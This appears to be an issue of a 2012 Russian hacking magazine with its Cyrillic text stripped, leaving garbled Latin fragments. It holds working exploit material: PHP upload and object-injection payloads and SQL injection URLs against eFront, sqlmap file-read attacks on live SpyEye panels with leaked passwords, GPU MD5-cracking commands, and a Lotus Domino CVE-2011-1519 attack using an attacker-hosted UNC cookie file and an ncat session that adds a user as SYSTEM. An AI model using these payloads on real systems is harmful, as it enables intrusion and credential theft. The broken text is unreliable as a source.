templateName=sh.php%00&templateContent=
<?php evil_code(); ?>
3. SQL- UPDATE.
getUserTimeTarget(), /libraries/
tools.php: .
, package_ID,
$entity. , /www/
periodic_updater.php:
TARGETS
Wordpress Zingiri Web Shop Plugin 0.9.12 2.2.3.
, file_put_
contents() $_POST['templateName'] $_
POST['templateContent'], . ,
, ,
php,
magic_quotes_gpc. ,
, :
if ($_SESSION['s_login']) {
$entity = getUserTimeTarget($_GET['HTTP_REFERER']);
//$entity = $_SESSION['s_time_target'];
//Update times for this entity
$result = eF_executeNew("update user_times set time=time+("
.time().
"-timestamp_now),timestamp_now="
.time().
"where session_expired = 0 and session_custom_identifier = '".
$_SESSION['s_custom_identifier'].
"' and users_LOGIN = '".
$_SESSION['s_login'].
"' and entity = '".
current($entity).
"'and entity_id = '".
key($entity).
"'");
01 /156/ 2012
, $_GET['HTTP_REFERER'], getUserTimeTarget(),

eF_executeNew(). ,
SQL- URL
:
http://localhost/efront/www/periodic_updater.php?
HTTP_REFERER=http://host/?package_ID=[SQL]

$_SERVER['HTTP_REFERER'], , -,
.
.
4. .
/www/index.php:
if (isset($_COOKIE['cookie_login'])
&& isset($_COOKIE['cookie_password']))
{
try {
$user = EfrontUserFactory :: factory(
$_COOKIE['cookie_login']);
$user -> login($_COOKIE['cookie_password'], true);
$_COOKIE['cookie_login'],
EfrontUserFactory::factory(),
,
:
GET /efront/www/index.php HTTP/1.1
Host: localhost
Cookie: cookie_login=admin;cookie_login=1;cookie_
login=administrator;cookie_login=1;cookie_password=1
Connection: keep-alive
5. PHP-. /www/student.php:
if (isset($_GET['course']) ||
isset($_GET['from_course']))
{
if ($_GET['course'])
{
$course = new EfrontCourse($_GET['course']);
} else {
$course = new EfrontCourse($_GET['from_course']);
}
$eligibility = $course -> checkRules(
$_SESSION['s_login']);
, $_GET['course'] $_GET['from_
course'],
EfrontCourse, ,
eval():
/student.php?lessons_ID=1&course[id]=1&course
[directions_ID]=1&course[rules]=a:1:{s:19:"1];
phpinfo();die;/*";a:1:{s:6:"lesson";i:0;}}
TARGETS
eFront <= 3.6.10 (build 11944).

SOLUTION
01 /156/ 2012
059
MD5
(blog.chivavas.org)
INFO
WWW
ATI
Radeon HD 4850
X2
2,2

!
bit.ly/vEhdir

RainbowCrack
API.
MD5

.
bit.ly/vTSB9K

DVD

MD5.
, . -,
,
,
. , , MD5.
.

: , . ,
.

. - ( )
, . .
MD5.
MD5 128- . , 128- , .

1991
MD4.
1992 RFC 1321. MD5
, CMS
- SSL-.
, MD5 ,
1993 . , . ,
1996-, ,

MD5. , ,
SHA1 ( , ,
SHA2) RIPEMD-160.

MD5 1 2004 .
CertainKey Cryptosystems MD5CRK . -. 24 2004
, ,
060
01 /156/ 2012
MD5
, - . , 31 2008 NIST
. SHA1 SHA2.
BLAKE, Gostl, JH,
Keccak Skein. .
I GHASHGPU: GPU
MD5-
. . ,
- : d8578edf8458ce06fbc5bb76a
58c5ca4. Ighashgpu, www.golubev.com
.
.
, Ighashgpu GPU,
nVidia ATI c CUDA/
ATI Stream.
, CPU,
.
GPU ,

. , :
Windows:
ighashgpu.exe -t:md5 \
-h:d8578edf8458ce06fbc5bb76a58c5ca4 -max:7
MD5
, ,
.
IBM p690 (,
). :-) 2005
.
X.509 , .
, . 2006
. 2006 , !
. 2008
Chaos Communication Congress
X.509. MD5.

. 2007 , Sony PlayStation3 MD5. : 1,4 MD5- ! , 2009-, BlackHat
USA GPU ,
,
.
?
2011 IETF RFC 1321 (MD5)
RFC 2104 (HMAC-MD5). RFC 6151.
MD5
. ,
MD5. , MD5
, ,
,
01 /156/ 2012

, MD5.
.
- (qwerty).
, . d11fd4559815b2c3de1b685bb7
8a6283, , ,
_admin.
, :
ighashgpu.exe -h:d11fd4559815b2c3de1b685bb78a6283 -t:md5
-u:[abcdefghijklmnopqrstuwvxyz1234567890_] -m:??????_admin
'-u' , , '-m' .
,
_admin.
.

, -
.
,
. ,
. ,
,
. ,
, .
- , .
,
.
061

8- , 126
ASCII, 63 527 879 748 485 376 . 254
17 324 859
956 700 833 536, 2,7 ,
. , ,
. , , .
MD5
encrypted.dat
IGHASHGPU:
. ,
. , c00l:
f0b46ac8494b7761adb7203aa7776c2a
f2da202a5a215b66995de1f9327dbaa6
c7f7a34bbe8f385faa89a04a9d94dacf
cb1cb9a40708a151e6c92702342f0ac5
00a931d3facaad384169ebc31d38775c
4966d8547cce099ae6f666f09f68458e
encrypted.dat Ighashgpu
:
ighashgpu.exe -t:md5 -u:[abcdefghijklmnopqrstuwvxyz1234567890_]
-m:??????c00l encrypted.dat
Ighashgpu ighashgpu_results.txt :
f0b46ac8494b7761adb7203aa7776c2a:1rootxc00l
f2da202a5a215b66995de1f9327dbaa6:pwd12xc00l
c7f7a34bbe8f385faa89a04a9d94dacf:pwd34yc00l
cb1cb9a40708a151e6c92702342f0ac5:pwd56yc00l
4966d8547cce099ae6f666f09f68458e:pwd98zc00l
00a931d3facaad384169ebc31d38775c:pwd78zc00l
IGHASHGPU:

,
.

. 80- ,
, 640 10 ,
. ,
.
2003 , , ,

, -.
- .
.
, ,
- ( ,
64 ).
, .
. ,
. ,
. ,
. .
,
. ,
.

.
, .
.
. , :
var plain = password + "s41t";

var hash = md5(plain);
.
RainbowCrack (project-rainbowcrack.com), Windows,
: 42151cf2ff27c5181bb36a8b
cfafea7b.
Ighashgpu -asalt:
ighashgpu.exe -h:42151cf2ff27c5181bb36a8bcfafea7b \
-t:md5 -u:[abcdefghijklmnopqrstuwvxyz1234567890_] \
-asalt:s41t
062
RAINBOW TABLES
,

8599%.
01 /156/ 2012
MD5
Linux. : LN/
NTLM, MD5 SHA1. ,
- . MD5.
: , ,
. Free Rainbow
Tables (freerainbowtables.com). ,
, , .
3 MD5, SHA1, LM NTLM.
,
. : LN/NTLM, MD5
SHA1 200 .
.
rtgen, RainbowCrack. :
hash_algorithm (LM, NTLM, MD5
SHA1);
charset ,
charset.txt;
plaintext_len_min plaintext_len_max ;
table_index, chain_len, chain_num part_index
, (bit.ly/nndT8M).
:
1. table_index ,
. 0, .
2. chain_len .
3. chain_num .
4. part_index , .
( 0).
MD5:
rtgen.exe md5 loweralpha-numeric 1 7 0 2000 97505489 0
,

. Eee PC Intel Atom N450
:). md5_
loweralpha-numeric#1-7_0_2000x97505489_0.rt 1,5 .
,
.
rtsort.exe:
rtsort.exe md5_loweralpha-numeric#1-7_0_2000x97505489_0.rt
!
. :
d8578edf8458ce06fbc5bb76a58c5ca4. rcrack_gui.exe
Add Hash... File.
OK. .
Search Rainbow Tables... Rainbow Table.
,
md5_loweralpha-numeric#1-7_0_2000x97505489_0.rt,
Open. !
.
VS. CPU VS. GPU

, , Ighashgpu
MD5- , ,
RainbowCrack
01 /156/ 2012
.
.
MDCrack, CPU (
).
GPU (nVidia GeForce GT 220M), CPU (Intel Atom N450,
) :

4
5
6
7
|
|
|
|
|
GPU
00:00:01
00:00:02
00:00:16
00:07:11
|
|
|
|
|
CPU
00:00:01
00:00:09
00:05:21
09:27:52
|
|
|
|
|
00:00:16
00:00:16
00:00:10
00:00:04
, CPU , GPU .
,
,
. ,
, 4- 5- ,
.
,
. , .

.
-, ,
MD5 SHA1. - SHA2 SHA3
( ). -,
.
.
-,
. ,
100 %, . z
063
Sanjar Satsura (sanjar@xakep.ru, twitter.com/#!/sanjar_satsura)
-
SPYEYE

.

.

,

.
, , . ,
,
SpyEye. -. ,
gribodemon Zeus, .
][ ,
SpyEye.
.
SpyEye
&C- ( SpyEye
Tracker)
,
.
.
064
01 /156/ 2012
WWW
bit.ly/tBYWgi

Google ;
SpyEyetracker.abuse.ch
SpyEye Tracker;
pastebin.com/
T0pUiEJp

;
bit.ly/sXe4PC

SpyEye ;
exploit-db.com

.
WARNING

.
,

,

.
SPYEYE
, SpyEye. . - (form grabbing),
webinjects (webinjects.txt)
( ) ,
. .
,
( , plugins).
DDoS,
RDP, SOCKS-, . .
( #10/2011
][).
( ). SpyEye TDL,
.
, 2009
,
, -
. Symantec, SpyEye
70 % Zeus ( ,
),
.
-, SpyEye
- .
- (C&C)
PHP, -
- . , - .

,
:
1. . ,
, PHP.
PHP-. , , PHP Bug
Scanner, Raz0r (bit.ly/tBFuwY).
crime kits .
SpyEye
01 /156/ 2012
065
SPYEYE
SpyEye Trojan Source Code Published!
.
- ?

, . ,
SpyEye .
,
Xylit0l, , ,
,
, .
, VMProtect,
SpyEye. , .
2. .
, , ,
Google Dorks ( ) .
3. .
Apache, MySQL, PHP ,
.
, ,
. .
,
1.0.2.
,
( frm_cards_edit.php):
Android.
Android.SpyEye.1. , SpyEye.
,
, ,
-. ,
- , ,
,
, -.
,
-. ,
, ,
NNNNNN. Android.SpyEye.1
,
.
: 251340.
-,
, .
$id_card = (int)$_GET['id'];
....
$id_card = $_GET['id']; if (!@$id_card) exit;
$dbase = db_open();if (!$dbase) exit;
$sql = ' SELECT cards.num, cards.csc, cards.exp_date,
cards.name, cards.surname, cards.address, cards.city,
cards.state, cards.post_code, country_t.name_country,
cards.phone_num, email_t.value_email '
. ' FROM cards, country_t, email_t'
. ' WHERE cards.fk_email = email_t.id_email'
. ' AND cards.fk_country = country_t.id_country'
. " AND cards.id_card = $id_card"
. ' LIMIT 0, 1';
$res = mysqli_query ($dbase, $sql);
....
Blind SQLi,
, $id_card
- . gribodemon
int, , ,
:
, gribodemon ,
:). .
, : BENCHMARK() SLEEP().
,
BENCHMARK()
.
SQLI
SQLi
r00tw0rm.com
Havij SQLi-. , frm_
findrep_sub2.php, , id
. sqlmap
, SQL- (sqlmap.
sourceforge.net):
sqlmap.py -u "http://92.241.1.1/frmcp1/frm_findrep_sub2.
php?id=1" --file-read=/var/www/frmcp1/config.php --tor
066
<?php
# Database
define('DB_SERVER', 'localhost');
define('DB_NAME', 'spyxz');
define('DB_USER', 'admin');
01 /156/ 2012
define('DB_PASSWORD', 'SpyEye2db');
# Admin
define('ADMIN_PASSWORD', 'r0t0wVr34xzbdQH');
?>
! !
, SQL-
, .
.
,
. ,
, SpyEye
( SpyEye_b0t.pl). C&C
SpyEye
Tracker (spyeyetracker.abuse.ch). ,

SpyEye. -
, ,
. !
, Google Dork?
.
:
intitle:"SYN 1" "Please, enter password"
intitle:"CN" "Your JavaScript is turned off. Please, enable
your JS"
intitle:"SYN" "Your JavaScript is turned off. Please, enable
your JS"
"Please, enter password:" inurl:"frm_auth.php"
intitle:"FRMCP"
"index of /SpyEye/"
Google Dorks
mysql db name = "collector"

mysql host = "127.0.0.1"
...
:
http://trylook.ru/frmcp1/
http://212.36.9.59/adm/frmcp/
http://zerocrown.webcindario.com/
http://alaggaer.ans1.rock21.us/SpyEye/main/
http://92.241.165.228/SpyEyeCollector/
, ,
92.241.165.228 ,
:
...
[FOUND] http://92.241.165.228/config.ini
[FOUND] http://92.241.165.228/error.log
[FOUND] http://92.241.165.228/frm_findrep_sub2.php
[FOUND] http://92.241.165.228/mod_perlre.php
[FOUND] http://92.241.165.228/frm_settings.php
.....
[FOUND] http://92.241.165.228/SpyEyeCollector/configs/
sec.config
.....
SpyEye (sec.config):
...
listening port for logs = "53"
mysql username = "root"
mysql password = "samsung"
...
01 /156/ 2012
!
(root:samsung). .
?
, trylook.ru/frmcp1.
:
....
[FOUND]
[FOUND]
[FOUND]
[FOUND]
...
[FOUND]
...
http://trylook.ru/frmcp1/css/
http://trylook.ru/frmcp1/js/
http://trylook.ru/frmcp1/config.ini
http://trylook.ru/frmcp1/error.log
http://trylook.ru/frmcp1/installer/
, SpyEye?
,
. , , ,
.

,
- .
.
SpyEye? ,
.
. z
067
, Digital Security (twitter.com/asintsov)
Lotus,

LOTUS DOMINO CONTROLLER
INFO
IBM Lotus
Domino Server

IBM Lotus
Software,

IBM Lotus
Notes.
WWW
www.zerodayinitiative.com ZDI;
www.ibm.com/software/ru/lotus/ IBM
Lotus Software;
bugtraq.ru BugTraq;
dj.navexpress.com
DJ Java Decompiler.

, ,
,
.

.
.
IBM,
.
, , Lotus.
. . Lotus
: , , . . ,
,
.
, ,
, .
Lotus
. :)
- , ,
names.nsf -.
, , Lotus
8.5.2FP2. , exploit-db.com
.

BugTraq, ZDI, IBM c security- .
, , ,
068
. ,
, .
,
- ,
. :)
CVE-2011-1519
,
,
( , ). , ZDI ZDI-11-110,
0day ( ). :

Lotus Domino Server
Controller. .
, TCP- 2050.
COOKIEFILE,
01 /156/ 2012
Lotus,
.
.
UNC,
. ,
SYSTEM.
:
COOKIEFILE
, \\evilhost\password_cookie_file,
.
, ,
.
.
, , 2050. , Lotus .
.
, .
, , ,
nmap.
Lotus-,
, ,
.
:
socket:reconnect_ssl()
...
socket:send("#API\n")
socket:send( ("#UI %s,%s\n"):format(user,pass) )
socket:receive_lines(1)
socket:send("#EXIT\n")
...
, Lotus-
: SSL-,
#. ,
admin pass
#UI admin,pass. , , nmap
COOKIEFILE . ,
, #COOKIEFILE \\evil\
file. , ,
( ,
).
-
. ,
Java, IDA Pro, - . DJ decompiler (members.
fortunecity.com/neshkov/dj.html), jar- C:\

Program Files\IBM\Lotus\Domino\Data\domino\java\dconsole.jar
Java-.
, NewClient.class,
.
:
// s1 2050/tcp
if(s1.equals("#EXIT"))
return 2;
...
if(s1.equals("#COOKIEFILE"))
if(stringtokenizer.hasMoreTokens())
// . :
// #COOKIEFILE < >
cookieFilename = stringtokenizer.nextToken().trim();
return 7;
...
if(!1.equals("#UI"))
//
usr = stringtokenizer.nextToken(",").trim();
if(usr == null)
return 4;
// ,
pwd = stringtokenizer.nextToken().trim();
return 0;
...
.
:
/* */
do{
// ReadFromUser
int i = ReadFromUser();
...
if(i == 6) { // #APPLET
appletConnection = true;
continue;
}
...
userinfo = UserManager.findUser(usr);
if(userinfo == null) {
// ... !
WriteToUser("NOT_REG_ADMIN");
continue;
}
...
if(!appletConnection)
// #APPLET,
flag=vrfyPwd.verifyUserPassword(pwd,userinfo.userPWD());
else // #APPLET
// COOKIE? !
flag = verifyAppletUserCookie(usr, pwd);
...
} while(true); // end loop
if(flag) // ,
// , !
...
,
#APPLET #UI #COOKIEFILE. , , ,
Ncat-
01 /156/ 2012
069

admindata.xml. , ,
( NOT_REG_ADMIN )!

.
adm,
.
verifyAppletUserCookie:
//#COOKIEFILE <cookieFilename>
if(cookieFilename == null || cookieFilename.length() == 0)
return flag;
// !
File file = new File(cookieFilename);
...
inputstreamreader = new InputStreamReader(
new FileInputStream(file),"UTF8");
...
//s7 cookieFilename
do {
if((j = s7.indexOf("<user ", j)) <= 0) break;
...
String s2 = getStringToken(s7, "user=\"", "\"", j, k);
...
String s3 = getStringToken(s7, "cookie=\"", "\"", j, k);
...
String s4 = getStringToken(s7, "address=\"", "\"", j, k);
...
if(s5.equalsIgnoreCase(s2) && s6.equalsIgnoreCase(s3)
&& appletUserAddress.equalsIgnoreCase(s4)) { //!
flag = true; break;
}
...
} while(true);
,
username, password address username, password
address cookiefile, ,
! ,
:
1. <user> .
2. username, password, address.
3. ,
.
4. ,

.
CVE-2011-1519
.
1. cookie.xml:
LOAD CMD.exe /C net user add username password /ADD

BeginData
...
#APPLET , cookie .
#UI,
, #COOKIEFILE.
,
. #EXIT ,
! ? ,
LOAD,
.
, . , IBM
LOAD
, .
, nmap-, ,
. LOAD
, :
ncat --ssl tagetlotus_host 2050
#API
#APPLET
#COOKIEFILE \\fileserver\public\cookie.xml
#USERADDRESS dsecrg
#UI usr,psw
VALID_USER
#EXIT
$whoami
whoamiBeginData
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Lotus\Domino\data>whoami
NT AUTHORITY\SYSTEM
C:\Lotus\Domino\data>
,
.
,
#API , API Java-,
, ncat . ,
Lotus ,
SMBRelay.
?
<user name="usr" cookie="psw" address="dsecrg">
, . ?
, -. -,
, usr .
2. ,
, \\fileserver\public\cookie.xml.
3. ncat:
ncat --ssl targetlotus_host 2050
#API
#APPLET
#COOKIEFILE \\fileserver\public\cookie.xml
#USERADDRESS dsecrg
#UI usr,psw
VALID_USER
#EXIT
070
01 /156/ 2012
Lotus,
SMB- ? ,
, UNC ( , ).
,
- . , IBM , : cookiefile
. . ,
- \\evil\cookie\file,
, : .\\evil\cookie\
file, UNC . , SSL-,
. . IBM! , cookiefile,
, - XML-
XML-. XML, ! , , IBM,
XML- :
<?xml version="1.0" encoding="UTF-8"?>
<user name="admin" cookie="dsecrg" address="dsecrg">
:
Bla-bla-bla<user name="admin"xXXxcookie="dsecrg"Xaddress="
dsecrg"NYA>

. :
1. cookievalues Microsoft HTTPAPI
service ( \r\n Enter):
ncat targethost 49152
GET /<user HTTP/1.0\r\n
\r\n
ncat targethost 49152
GET /user="admin"cookie="pass"address="http://site.com"
HTTP/1.0\r\n
\r\n
2. - :
#Software: Microsoft HTTP API 2.0
#Version: 1.0
#Date: 2011-08-22 09:19:16
...
2011-08-26 11:53:30 10.10.10.101 52902 10.10.9.9
47001 HTTP/1.0 GET <user 404 - NotFound 2011-08-26 11:53:30 10.10.10.101 52905 10.10.9.9
47001 HTTP/1.0 GET name="admin"cookie="pass"address="
http://site.com"> 404 - NotFound ...
: IBM
<user , %20 ( ). ,
, <user ( 404 NotFound).
.
3. , -, :
ncat --ssl tagetlotus_host 2050
#API
01 /156/ 2012

1. ,
. , ,
ARP-POISONING,
(,
Cain, DoS
- mail.ru).
2. , .
, (
). ,
, ,
,
, ,
(,
Java 6 ROP ASLR).
3. IT- ,
- ,
.
4. . .
,

. , , ,
, 99
.
.
#APPLET
#COOKIEFILE ..\..\..\windows\system32\logfiles\httperr\
httperr1.log
#USERADDRESS http://twitter/asintsov
#UI admin,pass
#EXIT
$whoami
...
NT AUTHORITY/SYSTEM
...
UNC,
- .

. -,
, , .
-, .
-, , - (
, LOAD TELL
).
admindata.xml. MD5. ,
. 4, 25 26 ,

. ,
, ! z
071
(icq 884888, http://snipper.ru)
X-Tools

:
scarlet0
URL:
bit.ly/tIS6m2
:
Windows
URL:
3.14.by/ru/md5
:
Windows
:
cel1697i845
URL:
bit.ly/vmJ2g8
:
Windows
MSSQL
INJECTION HELPER
MD5-

MSSQL Injection Helper

, SQL.
,
MSSQL.
,

MySQL-.
:
Microsoft
SQL Server;
GUI;

;
;
, ;
;
;
;
.
,
! MSSQL Injection Helper ,
,
URL (, site.com/script.asp?id=1)
.
MD5-
?

BarsWF World Fastest MD5 cracker.
,
MD5-
. ?
:
+ ;
+ -
;
+ ;
- MD5;
- ;
-
.
:
1.
. , Intel Core 2
Quad QX6700 (3,01 GHz)
200
!
2. Radeon:
AMD BROOK, CUDA
NVidia.
,
.
,
,
, .
, ,
?
!
Brutus hashes. New generation

!
, ,
, ,
. :-)

:
1. .
2. , .
3. .
4. ,
.
, . 6 131 066 257 801 .
072
01 /156/ 2012
X-Tools
PCI DSS !
PANBuster ,
, (
) .

PCI DSS,
-
PAN () .
, PANBuster
PCI QSA, ,
,
.
:
Windows, Linux, Mac OS X;
(VISA,
:
XMCO Security
Research Labs
URL:
www.xmco.fr/
panbuster.html
:
*nix/win/mac
:
TIMHOK
URL:
bit.ly/vZbhcN
:
Windows
Mastercard, American Express, JCB, Discover,

China Union);
(
1000 BIN);
PAN
: MySQL, MSSQL (-),
PostgreSQL, Excel, VMware VMDK, Oracle
();
(.ZIP,
.GZ, .TGZ);
.
: (./panbuster
-f ../) , (
- -).
:
YGN Ethical Hacker
Group
URL:
bit.ly/vDpEt8
:
*nix/win
:
SuRGeoNix
URL:
bit.ly/lXxLkm
:
Windows
SCREEN-

JOOMLA!
WEBSURGERY,

,
, screen-. , ,
, ,
. ,
,
. , DDMgr screen-
.
:
;
;
;
;
,
;

( ,
);
,
DDMgr
,
. ,
,
,
.
OWASP Joomla! Vulnerability Scanner

OWASP'
. ,

CMS Joomla!
-
-.
:
;
WAF
;
;
HTML- ;
;

.

,
. :
WebSurgery : -, ,
SQL, XSS,
, WAF,
DoS , -. ,
PHP- vuln.php,
SQL-.
MySQL MD5- . .
1. (Initial Request):
01 /156/ 2012
joomscan.pl -u http://joomla-site.com/ \
-x proxy:port
GET /vuln.php?id= HTTP/1.1

HOST: 1.2.3.4
2. -
(List Configuration) : 1 32 ( MD5),
.
3. :
GET /vuln.php?id=1+and+'${List_2}'=
substring((select+password+from+admin+
limit+1),${List_1},1) HTTP/1.1
HOST: 1.2.3.4
073
Mifrill (mifrill@real.xakep.ru)
074
01 /156/ 2012
?
, .
,
.
.
,
, ,
,
, , , , .

, , ,
,
. ,
, ,
,

.
, ? Hackerspace
hackspace ,
,
. ,
IT.
, ,

. , ,
, ,
. .

,

.
, , . -
,
do it yourself
( ). , -
{ neuron }
.

,

. , .
,
,
.
, ,
.
01 /156/ 2012
075

:).
C-Base. !
,
, ,
! ,

,
: , , ,

. ,
,
.
,
,
.
, ,
- : 3D-,
,
. ,
.
, ,
- ,
.
,
, ,
.
3050
. ,
10001500 . ,
,
.
, ,
, , ,
,

.
, ,
,
,
-
,
. ,
,
hackerspaces.org, , . ----
.
, ! .
,
.
,
, ,
Neuron
(neuronspace.ru).

. ,
FOSS Labs .
:
, ,
, -. ,
Neuron
.
:
(eSage lab,

-base
London Hackspace (LHC)
NYC Resistor
: www.c-base.org.
: , .
: 300+.
: 17 .
: london.hackspace.org.uk.
: , .
: 300+.
: 5 .
: www.nycresistor.com.
: , -.
: 30+.
: $75115.
C-base
1995 .
.
076
.
, 2009 ,

.

.
NYC Resistor
. 2008 .
01 /156/ 2012
), (Fairwaves, )
(eSage lab).
.

. , ,
,
,
.
, , , ,

, .
CCC ,
, ,
. CCC
, .

,
,
. ,
, C-base .
, .
, , .
. ,
, ,
, - , ... ,
:). ,
, .
Neuron
,
.

. ,
.
,
- , , .

.

.
? .
,
.
,

?

. ,
(
3D-). Neuron
, ,
. ,
Software Defined Radio,
.
WiMAX GSM. ,
,
.
3D-. ,

,
.
Kiberpipa
Metalab
: www.kiberpipa.org.
: , .
: 20 40 ,
.
: .
: www.metalab.at.
: , .
: 130+.
: 20 .

. , 2001
, ,
-.
01 /156/ 2012

. 2006 . Metalab
.
,
neuronspace.ru.
,
,
Arduino. , ,
! ,
1517 .
, , , :
. , 15 ,
, 150,
.

, ,
. , Neuron,

, .
,

!
, ,
, , (,
;
).
,
! HackSpace Saint-Petersburg, -
077

.
- .
, .

: -
3D-, ,
, ,
3D-
.
,
.
, , ,

(hackspace-spb.ru).
, , ?
?

,
(po@kumekay.
com). , :

. , .
, , .
-
, (
29 . .
Mifrill): , -
.
.
40 .
. : ,
, .
, ,

.
,
,
, . ,
,

. ,
,
. ,
( )
. ,

,
C-Base, , ,
078
01 /156/ 2012
NYC Resistor
. , , , ,
.
:

$50100,
(, , ;
1030 ). ,
,
- ,
,
.
, , ,
.
,
,
.
, .
?
? .
.
-
NYC Resistor.
, , MakerBot, 3D-.
30 .
. ,
. -
NYC Resistor :
,
, . ,

. :)
,
, ,
. ,
,
200300 -
01 /156/ 2012
. , ,
,
,
.
(, -
, ), .
,
,
, ,
- .
, C-Base 300 .
,
. C-base
.
, ,
, .
, ,
Space Foundation, -

. ,
,
(Space Foundation , ),
,
,
,
. ,
, .

Neuron.
100 .
120 .
( ),
.
: . , ,
. .
:).
6
, 2 . .
Neuron
. ,

. , ,

,
.
,
.
, ,
HackSpace-SPb
. ,
,
,
. z
079
MALWARE
, Senior malware researcher, ESET
, Stuxnet

.

IDA
Stuxnet,
,

.
WIN32/DUQU:

STUXNET
,
RSS- .

Stuxnet
. , Symantec,
, - , - Duqu. ,
research Stuxnet. , Duqu
Stuxnet , ,
, Stuxnet. =)

,
Cryptography and System Security (CrySyS). Duqu, Stuxnet,

. , CrySyS
-
Duqu , .
. 1. !
080
01 /156/ 2012
.2. .
Duqu ,
.
, .
, , Duqu, Stuxnet,
.

Duqu :
0) doc-, , CVE-2011-3402.
1) - win32k.sys.
2) -, .
3) .
4)
services.exe Duqu . .
- Duqu Stuxnet.
, -, .

,
Duqu .
, -
. 4.
. 5.
Stuxnet
cmi4432.sys,
, C-Media Electronics Inc. ,
, VeriSign
2012 ( 1).
. Duqu
. ,

.
DUQU
,
, 3.
, .
,
, . ,
Duqu , .
4.
,
,
Stuxnet. , , ,
,
. 5 Stuxnet, 6 Duqu.
.3.
01 /156/ 2012
(,
): , ,
, , , , , , .
, .
, ,
Duqu Stuxnet.
,
,
. ,

,
Stuxnet, Duqu.
081
MALWARE

, .

?
Win32/Duqu, , . , ,
.
, Duqu
,
, (
, ).
. , main.dll (
Duqu),
UTC-. 7 ,
.
.
Duqu: the precursor to the next Stuxnet ,
36 ,
. ,
( 8).
, ,
, , -
. 7.
. 8.
. 9.
. 10.
14.10.2011
19.10.2011
1.11.2011
3.11.2011
4.11.2011
CrySyS

.

Duqu: the precursor to the next Stuxnet,

Win32/Duqu.

(, ,
).

(CVE2011-3402),
,

CrySyS.
Microsoft Security Advisory (2639658),

.
,

win32k.sys

TrueType.

CVE-2011-3402
Microsoft
Active Protections Program
(MAPP).

CrySyS, Symantec
Microsoft.
,

,
.
082
01 /156/ 2012
Stuxnet
Duqu
SCADA-
1-day
0-day
RPC-
remote
local
. 11. RPC Duqu
.
, ,
36 , 30. , 11.08.2011,
7:50:01 36
, 9,
18.08.2011, 7:29:07 30 10.
( )
Visual C++
ATL
UPX
RPC- DUQU VS STUXNET

RPC-
Duqu Stuxnet. RPC-
Stuxnet. Duqu ,
Stuxnet under
the Microscope (. 5657), . RPC
Duqu BinDiff,
( 11).
, , Duqu. RPC :
RpcHandler_1 ;
RpcHandler_2
;
RpcHandler_3 ;
Stuxnet vs. Duqu
RpcHandler_4
CreateProcess();
RpcHandler_5 (,
);
RpcHandler_6 ;
RpcHandler_7 .
,
, 12.
RPC-

.
. 12. ,
01 /156/ 2012

Stuxnet 80 :),
?.
,
. ,

. , Stuxnet, Duqu

. ,
Duqu,
, , .
-,
.
, , ,
Duqu . z
083
MALWARE
(http://group.xakep.ru)
:
bootkit test
BITDEFENDER, ESET NOD32, F-SECURE,
OUTPOST SECURITY, RISING

, MBR, :
MS-DOS,
Doom 2
.

.

?
? - !
084
Outpost Security Suite Pro 7.5
01 /156/ 2012
: bootkit test
Sinowal NOD
MBR Boot- :
1) BitDefender Internet Security 2012 , BitDef

. ,
.
2) ESET NOD32 Smart Security 5 ,
.
3) F-Secure Internet Security 2012
-.
4) Outpost Security Suite Pro 7.5 Agnutim, . , Outpost
. ,
Comodo.
5) Rising Internet Security Rising.
, .
LET THE CONTEST BEGIN

Windows XP SP3 VmWare
Sinowal, , , 2009 .
Hiew , MBR ,
(
) .
BitDefender. , !
,
( downloader), - 55 %.
.
-, Sinowal BitDefender,
.
NOD32 . temp, MBR. , .
MBR, Sinowal
01 /156/ 2012
F-Secure Internet Security Sinowal
F-Secure Internet Security

Win32/Mebroot, NOD32. ,
GUI . -,
MBR . :)
Outpost :
Sinowal, MBR .
, Agnitum -
, .
Rising .
, . ,
VmWare, , (
). -, Sinowal
.
: GHODOW
,
, Sinowal,
.
, Sinowal, , ,
. Win32/Ghodow.
NAD ( ESET).
Ghodow.
MBR
085
MALWARE
(http://group.xakep.ru)
ESET Smart Security 5 Ghodow
, Rising Internet Securit
BitDefender :

.
, BitDefender
Rescue Mode, *nix- , .

: BitDefender .
NOD32 :
MBR- 0.
, , .
MBR,
.
, quick/
- .
,
, , ,
.
Hiew ,
0x200 0x200 0x1000 . , , , ,
MBR. ,
BitDefender, Rising ,
. ,
, , .
, MBR
. , ,

MBR, , .
NTFS- ( , -)
.
-
, MBR.
BitDefender 2012
086
?
. , , .
, , : ;). z
BitDefender,

BitDefender 2012
01 /156/ 2012
Preview
UNIXOID
112
ANDROID
CyanogenMod,
- ,
2
Android-.
, firmware.
,
,
.

,
,
,
, 3G- ..

Android-
.
88
.NET-

-.

Microsoft . -.
SYN\ACK
118

?
, , ,
.
01 /156/ 2012
UNIXOID
102

,
. opensource.
FERRUM
126
- NAS'
Pentium
IDE- sux! , 12
NAS' .
SYN\ACK
122

100 . .
?
132
LOOP
,
,
. .
087
plaintext (first@plaintext.su, www.plaintext.su)
.NET

.NET FRAMEWORK

,

.

,
,
,
.
,

,

().
088
INFO
Strong name
,

, ,
WWW
http://gacbrowser.
blogspot.com/
GAC
Browser.
bit.ly/uyxZs5
,

28147-89 C#.
DVD

.
, .NET Framework,
System.Security.Cryptographi,
, .NET Framework
CLR
.
.NET,
.
SYSTEM.SECURITY.CRYPTOGRAPHI
, , .NET Framework
System.Security.Cryptographi,
:
,
, - . .;

, . .;
X.509 XML-
(XMLSignature).
,
, (. 1). ,

SymmetricAlgorithm,
01 /156/ 2012
.NET-
AssymetricAlgorithm, HashAlgorithm
KeyedHashAlgorithm ,
-. .NET
, ,
. 28147-89 ,
, ,
.
SYMMETRICALGORITHM
, .NET Framework
SymmetricAlgorithm. MSDN,

:
public
public
public
public
virtual ICryptoTransform CreateDecryptor();

virtual ICryptoTransform CreateEncryptor();
abstract void GenerateIV();
abstract void GenerateKey();
,
,
. , ICryptoTransform .
MSDN . ,
ICryptoTransform
. :
int TransformBlock(byte[] inputBuffer,
int inputOffset, int inputCount,
byte[] outputBuffer, int outputOffset);
byte[] TransformFinalBlock(byte[] inputBuffer,
int inputOffset, int inputCount);

, . MSDN
, , SymmetricAlgorithm, ,
(CBC).
, 28147-89
, CBC . ,
.NET Framework , ,
(CFB).
, .
28147-89
, 28147-89
ECB ( )
, .NET Framework CFB.
GostCfb, .
CFB ( )
01 /156/ 2012
.NET Framework
namespace Gost
{
public class GostCfb : SymmetricAlgorithm
{
public GostCfb(){}
public override ICryptoTransform CreateDecryptor
(
byte[] rgbKey,
byte[] rgbIV
){}
public override ICryptoTransform CreateDecryptor()
{}
public override ICryptoTransform CreateEncryptor
(
